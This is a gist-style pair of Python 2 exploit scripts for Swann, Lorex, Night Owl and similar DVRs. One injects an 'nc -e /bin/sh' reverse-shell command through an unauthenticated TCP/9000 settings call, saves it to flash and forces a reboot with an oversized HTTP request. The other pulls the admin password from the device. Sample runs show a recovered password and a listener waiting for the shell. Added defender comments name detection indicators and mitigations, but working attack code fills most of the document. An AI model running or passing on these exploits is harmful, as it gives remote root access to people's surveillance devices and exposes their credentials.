Own your DVR (Mfgs: Swann, Lorex, Night Owl, Zmodo, URMET, kguard security, etc.; models: DVR04B, DVR08B, DVR-16CIF, DVR16B, etc.)
See the original post for the source of this code:
http://console-cowboys.blogspot.com/2013/01/swann-song-dvr-insecurity.html
import socket,os,sys,re
# sploit.py (script 1 of 2 in this gist) -- Python 2 code: bare `print`
# statements, `str` used directly as the wire bytes.
# Sequence as written below: an MCTP "HI_SRDK_NET_SetPppoeAttr" request to
# TCP/9000 whose body embeds a shell command string (lHost/lPort are the
# connect-back endpoint), then a "HI_SRDK_DEV_SaveFlash" request, then an
# oversized GET to TCP/80, then a local `nc` listener on lPort.
#
# Defender notes (risk / detection / mitigation):
#   - Risk: nothing in this script authenticates to the device before pushing
#     settings, so anything that can reach TCP/9000 can do the same.
#   - Detection: the literal request lines "REMOTE HI_SRDK_NET_SetPppoeAttr
#     MCTP/1.0" and "REMOTE HI_SRDK_DEV_SaveFlash MCTP/1.0" on TCP/9000, an
#     HTTP request line padded with ~4000 'A's on TCP/80, and an outbound TCP
#     session from the DVR to a host that is not its NVR/management station
#     are the observable indicators.
#   - Mitigation: keep TCP/9000 and TCP/80 of these DVRs off untrusted
#     networks, place cameras/DVRs on an isolated VLAN with default-deny
#     egress (which blocks the connect-back), and retire end-of-life units.
if(len(sys.argv)<4):
    print 'Usage: %s <target> <connectback host> <connectback port>' % sys.argv[0]
    sys.exit()
lHost = sys.argv[2]   # host the device is told to connect back to
lPort = sys.argv[3]   # port on that host; also used for the nc listener below
#stage 1 - updates the settings
# MCTP request header for the settings-update call. Content-Length:249 is
# hard-coded; the body sent is s2 + payload.
s1 ='REMOTE HI_SRDK_NET_SetPppoeAttr MCTP/1.0\r\n'
s1 +='CSeq:3\r\n'
s1 +='Accept:text/HDP\r\n'
s1 +='Content-Type:text/HDP\r\n'
s1 +='Func-Version:0x10\r\n'
s1 +='Content-Length:249\r\n\r\n'
# Segment header; Data-Length:200 is hard-coded as well.
s2 = 'Segment-Num:1\r\n'
s2 += 'Segment-Seq:1\r\n'
s2 += 'Data-Length:200\r\n\r\n'
# Body: a fixed-offset binary structure ('\x00' padding) with a ';'-separated
# shell command string embedded in it. The padding after the host/port pair
# is sized so the following field stays at a fixed offset.
payload = '\x01' + '\x00' * 67
payload += ';udhcpc;nc -e /bin/sh' + '\x00' * 11
#payload += '%s %s&' + '\x00' * (30 - (len(lHost),len(lPort))) % (lHost,lPort)
payload += '%s %s&%s' % (lHost,lPort,('\x00' * (30 - (len(lHost)+len(lPort)))))
payload += '\x00' * 70
# First connection: send stage 1, read and discard the reply.
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((sys.argv[1],9000))
print '[*]Sending Stage 1'
sock.send(s1+s2+payload)
sock.recv(1024)
sock.close()
# Second connection: stage 2 asks the device to persist the settings it just
# received (per the author's comment below).
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((sys.argv[1],9000))
#stage 2 - tells the device to save to memory
print '[*]Sending Stage 2'
s1 = 'REMOTE HI_SRDK_DEV_SaveFlash MCTP/1.0\r\n'
s1 += 'CSeq:4\r\n'
s1 += 'Accept:text/HDP\r\n'
s1 += 'Content-Type:text/HDP\r\n'
s1 += 'Func-Version:0x10\r\n'
s1 += 'Content-Length:15\r\n\r\n'
s1 += 'Segment-Num:0\r\n'
sock.send(s1)
sock.recv(1024)
sock.close()
# Third connection: an HTTP request line padded with 4000 'A's. The message
# printed here says the intent is to crash the web service so the device
# reboots with the saved settings (stated by the author, not verified here).
print '[*]Rebooting the server with crash....'
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((sys.argv[1],80))
sock.send('GET /' + 'A'*4000 + 'HTTP/1.1\r\n\r\n\r\n')
sock.close()
# Local listener for the connect-back. lPort comes straight from argv and is
# interpolated unquoted into a shell string via os.system.
os.system('nc -lv %s' % lPort)
$ python getPass.py 192.168.10.69
# [*]Host: 192.168.10.69
# [+]Username: admin
# [+]Password: 123456
# Usage: sploit.py <target> <connectback host> <connectback port>
$ python sploit.py 192.168.10.69 192.168.10.66 9999
# [*]Sending Stage 1
# [*]Sending Stage 2
# [*]Rebooting the server with crash....
# Ncat: Version 5.21 ( http://nmap.org/ncat )
# Ncat: Listening on 0.0.0.0:9999
import socket,binascii,sys,re
# getPass.py (script 2 of 2 in this gist) -- Python 2 code. Sends one fixed
# binary request (the hex blob t1) to TCP/9000 and scans up to 21 reply
# chunks for an "admin" record, printing the username and password found.
#
# Defender notes:
#   - Risk: if this prints credentials, the device returns its admin password
#     in response to an unauthenticated TCP/9000 request. Any unit that has
#     been reachable from an untrusted network should be treated as already
#     compromised: isolate it first, then rotate the credentials.
#   - Detection: a short client->server message on TCP/9000 followed by a
#     server reply containing the literal "admin" amid NUL-separated text.
t1 = '00000000000000000000010000000e0f0000000000000000000014000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.settimeout(2)   # 2 s per socket call; the loop below treats a timeout as "not vulnerable"
try:
    sock.connect((sys.argv[1],9000))
    sock.send(binascii.unhexlify(t1))
except:   # bare except: also swallows KeyboardInterrupt / SystemExit
    print '[!] Bad host.'
    exit()
b = ''
rcount = 0
# Read up to 21 chunks (rcount 0..20); stop on EOF or on the first match.
while(rcount <=20):
    try:
        a = sock.recv(1024)
    except:   # timeout or socket error; reported as not vulnerable
        print '[!] No reply, not vuln'
        sock.close()
        exit()
    if(a == ''):
        break   # peer closed the connection
    # Match "admin", five NUL bytes, a run of word characters (captured as
    # the password), two NUL bytes, then one more word character.
    b = re.findall('(admin)\x00{5}([\w]{0,})\x00{2}[\w]',a)
    if(b):
        print '[*]Host: %s' % sys.argv[1]
        print '[+]Username: %s' % b[0][0]
        print '[+]Password: %s' % b[0][1]
        break
    rcount += 1
# NOTE(review): the socket is not closed on the match/EOF paths; the
# interpreter exiting releases it for this one-shot script.